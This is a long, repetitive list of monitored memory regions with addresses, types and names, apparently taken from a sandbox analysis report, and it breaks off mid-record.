Region: id = 18987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18988 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18989 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18990 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18991 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18992 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18993 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18994 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18995 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19008 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19033 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19034 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19038 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19039 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19040 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19041 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19042 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19043 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19044 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19045 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19046 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19047 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19048 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19049 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19050 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19051 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19052 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19053 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19054 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19055 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19056 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19057 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19063 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19064 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19067 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19068 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19080 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 19081 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19082 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19083 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19084 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19087 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19096 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19097 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19142 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 19143 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19144 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19145 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19146 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19173 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19174 start_va = 0x610000 end_va = 0x61efff monitored = 1 